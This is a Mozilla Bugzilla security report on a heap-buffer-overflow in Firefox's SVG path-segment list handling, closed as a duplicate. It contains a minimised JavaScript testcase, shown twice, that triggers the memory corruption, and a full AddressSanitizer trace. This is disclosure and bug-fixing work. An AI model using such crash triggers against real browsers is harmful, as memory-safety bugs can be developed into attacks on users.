Closed Bug 1430560 Opened 6 years ago Closed 6 years ago

heap-buffer-overflow in mozilla::DOMSVGPathSeg::RemovingFromList

Categories

(Core :: SVG, defect)

Product:
Core
Component:
SVG
Version:
59 Branch
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1430557
Tracking Flags:
Tracking Status
firefox59 --- affected

People

(Reporter: nils, Unassigned)

Details

(Keywords: csectype-bounds)

Attachments

(2 files)

crash.html (minimised testcase)
1.10 KB, text/html
Details
ASAN output
9.68 KB, text/plain
Details 
The following testcase crashes the latest ASAN build of Firefox 59.0a1 (SourceStamp=21ddfb9e6cc008e47da89db50e22697dc7b38635).

<script>  
  o399=document.createElementNS('http://www.w3.org/2000/svg','path');
  o399.setAttribute('d', 'M 2 -9 M-917504 64 m524288 272629760 A0 3584 4094 0 0 32766 686 Q 1 -11,2 386 h 589824 V 1 H 8192 s 376832 1048569, 29698 33554432 M1020 64 C 1024 -786432, 16 0, 256 0 V 696 A10240 1 11 1 0 -14 983040 V 32 t6 32 V 126 Q 119 648,117 10 C 55 12, -2621443 432, 710 19 A4 600 534 0 1 10 1 Q 1 294,195 1 q 3 1048574,7 4294967295 v -10 H -3 s 31 1835008, 9 5 H 154 h 1 V 32 V 2097152 V 14 Q 531 54,8388608 -10 L-11 -3 M1 -2359302 a1 71 -2147483647 0 0 48234511 1 Q 262134 4,317 0 A14 134144 105 1 1 20 134217743 q 670 1,641 35 t468 4 H -27262976 C 65536 -14, -2147483648 628, 207 -96 q -40960 27,60 -10240 m1 8388608 c 805306368 2058, 114688 4, 243 1 t7864320 7232 M4 -65522 c -3 64, 14 4, 0.00000000001 1 H 7 S 1610612724 -18, 4 1 z');
  o782=o399.createSVGPathSegLinetoVerticalRel(4);
  o820=o399.animatedPathSegList;
  o670=o399.createSVGPathSegLinetoVerticalAbs(15);
  o1058=o399.pathSegList;
  for(var x=0; x<47; x++) o820[x];
  o1058.replaceItem(o782,35);
  o1058.insertItemBefore(o670,28);
  o1058.clear();
</script>

ASAN output:
=================================================================
==30545==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61800001fb90 at pc 0x0000004bdf99 bp 0x7ffcec556870 sp 0x7ffcec556020
READ of size 16 at 0x61800001fb90 thread T0 (file:// Content)
    #0 0x4bdf98 in __asan_memcpy /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3
    #1 0x7fdae91fcdad in mozilla::DOMSVGPathSeg::RemovingFromList() /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSeg.cpp:114:3
    #2 0x7fdae922bffb in mozilla::DOMSVGPathSegList::InternalListWillChangeTo(mozilla::SVGPathData const&) /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSegList.cpp:205:24
    #3 0x7fdae922cca1 in mozilla::DOMSVGPathSegList::Clear(mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSegList.cpp:289:19
    #4 0x7fdae6c5d267 in mozilla::dom::SVGPathSegListBinding::clear(JSContext*, JS::Handle<JSObject*>, mozilla::DOMSVGPathSegList*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/SVGPathSegListBinding.cpp:61:9
    #5 0x7fdae7d594f7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3036:13
    #6 0x7fdaee792d24 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #7 0x7fdaee792d24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #8 0x7fdaee9e3d07 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2559:14
    #9 0x233ad890252a  (<unknown module>)

0x61800001fb90 is located 0 bytes to the right of 784-byte region [0x61800001f880,0x61800001fb90)
allocated by thread T0 (file:// Content) here:
    #0 0x4bed33 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x7fdae2b623c8 in Malloc /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:196:46
    #2 0x7fdae2b623c8 in nsTArrayFallibleAllocator::ResultTypeProxy nsTArray_base<nsTArrayFallibleAllocator, nsTArray_CopyWithMemutils>::EnsureCapacity<nsTArrayFallibleAllocator>(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:136
    #3 0x7fdae718b2c7 in float* nsTArray_Impl<float, nsTArrayFallibleAllocator>::ReplaceElementsAt<float, nsTArrayFallibleAllocator>(unsigned long, unsigned long, float const*, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2025:47
    #4 0x7fdae92c0c43 in Assign<nsTArrayFallibleAllocator, nsTArrayFallibleAllocator> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1252:9
    #5 0x7fdae92c0c43 in Assign<nsTArrayFallibleAllocator> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1261
    #6 0x7fdae92c0c43 in mozilla::SVGPathData::CopyFrom(mozilla::SVGPathData const&) /builds/worker/workspace/build/src/dom/svg/SVGPathData.cpp:37
    #7 0x7fdae925d9ed in mozilla::SVGAnimatedPathSegList::SetBaseValueString(nsTSubstring<char16_t> const&) /builds/worker/workspace/build/src/dom/svg/SVGAnimatedPathSegList.cpp:57:27
    #8 0x7fdae932b296 in nsSVGElement::ParseAttribute(int, nsAtom*, nsTSubstring<char16_t> const&, nsIPrincipal*, nsAttrValue&) /builds/worker/workspace/build/src/dom/svg/nsSVGElement.cpp:422:20
    #9 0x7fdae5b3755c in mozilla::dom::Element::SetAttr(int, nsAtom*, nsAtom*, nsTSubstring<char16_t> const&, nsIPrincipal*, bool) /builds/worker/workspace/build/src/dom/base/Element.cpp:2608:8
    #10 0x7fdae5b36950 in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:894:12
    #11 0x7fdae5b36950 in mozilla::dom::Element::SetAttribute(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsIPrincipal*, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/Element.cpp:1348
    #12 0x7fdae777ac88 in mozilla::dom::ElementBinding::setAttribute(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:1167:9
    #13 0x7fdae7d594f7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3036:13
    #14 0x7fdaee792d24 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #15 0x7fdaee792d24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #16 0x7fdaee77dd56 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #17 0x7fdaee77dd56 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
    #18 0x7fdaee764700 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #19 0x7fdaee795cc1 in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:706:15
    #20 0x7fdaee79645f in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:738:12
    #21 0x7fdaef28f1e6 in ExecuteScript(JSContext*, JS::AutoObjectVector&, JS::Handle<JSScript*>, JS::Value*) /builds/worker/workspace/build/src/js/src/jsapi.cpp:4712:12
    #22 0x7fdae5e77846 in nsJSUtils::ExecutionContext::CompileAndExec(JS::CompileOptions&, JS::SourceBufferHolder&, JS::MutableHandle<JSScript*>) /builds/worker/workspace/build/src/dom/base/nsJSUtils.cpp:266:8
    #23 0x7fdae9c7caad in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2268:25
    #24 0x7fdae9c76d39 in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1911:10
    #25 0x7fdae9c740a3 in mozilla::dom::ScriptLoader::ProcessInlineScript(nsIScriptElement*, mozilla::dom::ScriptKind) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1555:10
    #26 0x7fdae9c589fe in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1293:10
    #27 0x7fdae9c57b19 in mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/workspace/build/src/dom/script/ScriptElement.cpp:147:18
    #28 0x7fdae4c9a84b in AttemptToExecute /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIScriptElement.h:246:18
    #29 0x7fdae4c9a84b in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:736
    #30 0x7fdae4c93ab4 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:540:7
    #31 0x7fdae4ca013b in nsHtml5ExecutorFlusher::Run() /builds/worker/workspace/build/src/parser/html/nsHtml5StreamParser.cpp:131:20
    #32 0x7fdae2bce710 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:395:25
    #33 0x7fdae2bf670d in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #34 0x7fdae2c114e0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #35 0x7fdae3a9c63a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #36 0x7fdae39f3f29 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #37 0x7fdae39f3f29 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #38 0x7fdae39f3f29 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299

SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3 in __asan_memcpy
Shadow bytes around the buggy address:
  0x0c307fffbf20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffbf30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffbf40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffbf50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffbf60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c307fffbf70: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c307fffbf80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c307fffbf90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffbfa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffbfb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffbfc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==30545==ABORTING
Attached file ASAN output 

    
    

    
  
Jonathan, is this something you could investigate? Thanks.
Group: core-security → layout-core-security
Flags: needinfo?(jwatt)
Keywords: csectype-bounds

    
    

    
  
This is the same underlying problem as bug 1430557. See bug 1430557 comment 3.
Status: NEW → RESOLVED
Closed: 6 years ago
Flags: needinfo?(jwatt)
Resolution: --- → DUPLICATE

    
    

    
  
For posterity, here's the the testcase from this bug with meaningful variable names:

<script>
  path = document.createElementNS("http://www.w3.org/2000/svg", "path");
  path.setAttribute("d", "M 2 -9 M-917504 64 m524288 272629760 A0 3584 4094 0 0 32766 686 Q 1 -11,2 386 h 589824 V 1 H 8192 s 376832 1048569, 29698 33554432 M1020 64 C 1024 -786432, 16 0, 256 0 V 696 A10240 1 11 1 0 -14 983040 V 32 t6 32 V 126 Q 119 648,117 10 C 55 12, -2621443 432, 710 19 A4 600 534 0 1 10 1 Q 1 294,195 1 q 3 1048574,7 4294967295 v -10 H -3 s 31 1835008, 9 5 H 154 h 1 V 32 V 2097152 V 14 Q 531 54,8388608 -10 L-11 -3 M1 -2359302 a1 71 -2147483647 0 0 48234511 1 Q 262134 4,317 0 A14 134144 105 1 1 20 134217743 q 670 1,641 35 t468 4 H -27262976 C 65536 -14, -2147483648 628, 207 -96 q -40960 27,60 -10240 m1 8388608 c 805306368 2058, 114688 4, 243 1 t7864320 7232 M4 -65522 c -3 64, 14 4, 0.00000000001 1 H 7 S 1610612724 -18, 4 1 z");

  baseList = path.pathSegList;
  animList = path.animatedPathSegList;

  line1 = path.createSVGPathSegLinetoVerticalRel(4);
  line2 = path.createSVGPathSegLinetoVerticalAbs(15);

  for(var x=0; x<47; x++) {
    animList[x];
  }

  baseList.replaceItem(line1, 35);
  baseList.insertItemBefore(line2, 28);
  baseList.clear();
</script>
Flags: sec-bounty?

    
    

    
  
Minusing for a bounty since it is the same underlying issue as bug 1430557.
Flags: sec-bounty? → sec-bounty-
Group: layout-core-security

          You need to log in
          before you can comment on or make changes to this bug.
        






  

    
  







  

    

      
Attachment

      

      
      
      
      
    

    

      

        

          

            
General

            

              Creator: 



            

            
Created: 

            
Updated: 

            
Size: